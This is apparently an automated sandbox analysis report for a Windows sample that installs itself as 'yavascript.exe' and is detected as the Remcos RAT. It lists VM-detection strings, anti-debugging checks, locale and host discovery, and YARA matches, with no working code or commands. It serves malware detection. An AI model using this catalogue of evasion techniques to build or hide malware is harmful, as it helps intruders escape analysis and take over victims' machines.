Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: 2iH7rqx9rQ.exe, 00000000.00000002.1754239939.00000000008FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0043A65D

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

0_2_0041BCE3

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00442554 mov eax, dword ptr fs:[00000030h]	0_2_00442554
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0089C33B push dword ptr fs:[00000030h]	0_2_0089C33B
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024B27BB mov eax, dword ptr fs:[00000030h]	0_2_024B27BB
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]	0_2_0247092B
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]	0_2_02470D90
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00442554 mov eax, dword ptr fs:[00000030h]	23_2_00442554
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B227BB mov eax, dword ptr fs:[00000030h]	23_2_00B227BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE092B mov eax, dword ptr fs:[00000030h]	23_2_00AE092B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AE0D90 mov eax, dword ptr fs:[00000030h]	23_2_00AE0D90
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B7BD43 push dword ptr fs:[00000030h]	23_2_00B7BD43
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00442554 mov eax, dword ptr fs:[00000030h]	24_2_00442554
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00A21223 push dword ptr fs:[00000030h]	24_2_00A21223
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_025527BB mov eax, dword ptr fs:[00000030h]	24_2_025527BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0251092B mov eax, dword ptr fs:[00000030h]	24_2_0251092B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02510D90 mov eax, dword ptr fs:[00000030h]	24_2_02510D90
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00442554 mov eax, dword ptr fs:[00000030h]	35_2_00442554
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_009B1213 push dword ptr fs:[00000030h]	35_2_009B1213
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_025227BB mov eax, dword ptr fs:[00000030h]	35_2_025227BB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E092B mov eax, dword ptr fs:[00000030h]	35_2_024E092B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024E0D90 mov eax, dword ptr fs:[00000030h]	35_2_024E0D90

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0044E92E GetProcessHeap,

0_2_0044E92E

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00434168
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043A65D
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00433B44
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00433CD7 SetUnhandledExceptionFilter,	0_2_00433CD7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A43CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_024A43CF
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024AA8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024AA8C4
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_024A3DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_024A3DAB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00434168
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_0043A65D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00433B44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00433CD7 SetUnhandledExceptionFilter,	23_2_00433CD7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B143CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00B143CF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B1A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00B1A8C4
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00B13DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00B13DAB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00434168
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0043A65D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00433B44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00433CD7 SetUnhandledExceptionFilter,	24_2_00433CD7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_025443CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_025443CF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_0254A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0254A8C4
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02543DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_02543DAB
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	35_2_00434168
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_0043A65D
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_00433B44
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00433CD7 SetUnhandledExceptionFilter,	35_2_00433CD7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_025143CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	35_2_025143CF
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_0251A8C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_0251A8C4
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_02513DAB IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	35_2_02513DAB

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	0_2_00410F36
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	23_2_00410F36
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	24_2_00410F36
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe	35_2_00410F36

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00418754 mouse_event,

0_2_00418754

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Process created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00433E0A cpuid

0_2_00433E0A

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_004470AE
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_004510BA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_004511E3
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_004512EA
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_004513B7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_00447597
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoA,	0_2_0040E679
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_00450A7F
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_00450CF7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_00450D42
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_00450DDD
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00450E6A
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_024B7315
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_024C1321
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_024C1044
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024C161E
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_024B77FE
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024C144A
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoW,	0_2_024C1551
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: GetLocaleInfoA,	0_2_0247E8E0
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_024C0F5E
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: EnumSystemLocalesW,	0_2_024C0FA9
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024C0CE6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_004470AE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_004510BA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	23_2_004511E3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_004512EA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	23_2_004513B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_00447597
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	23_2_0040E679
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	23_2_00450A7F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00450CF7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00450D42
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00450DDD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	23_2_00450E6A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00B31044
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_00B31321
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00B27315
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	23_2_00B3144A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_00B31551
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	23_2_00B3161E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	23_2_00B277FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	23_2_00AEE8E0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	23_2_00B30CE6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00B30FA9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	23_2_00B30F5E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_004470AE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_004510BA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_004511E3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_004512EA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_004513B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_00447597
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	24_2_0040E679
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_00450A7F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_00450CF7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_00450D42
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_00450DDD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_00450E6A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_02557315
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_02561321
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_02561044
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_0256161E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_025577FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_0256144A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	24_2_02561551
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	24_2_0251E8E0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_02560F5E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	24_2_02560FA9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_02560CE6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_004470AE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_004510BA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	35_2_004511E3
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_004512EA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	35_2_004513B7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_00447597
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	35_2_0040E679
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	35_2_00450A7F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_00450CF7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_00450D42
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_00450DDD
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	35_2_00450E6A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_02527315
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_02531321
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_02531044
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	35_2_0253161E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_025277FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	35_2_0253144A
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoW,	35_2_02531551
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: GetLocaleInfoA,	35_2_024EE8E0
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_02530F5E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: EnumSystemLocalesW,	35_2_02530FA9
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	35_2_02530CE6

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00434010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434010

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0041A7A2 GetComputerNameExW,GetUserNameW,

0_2_0041A7A2

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0044800F

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
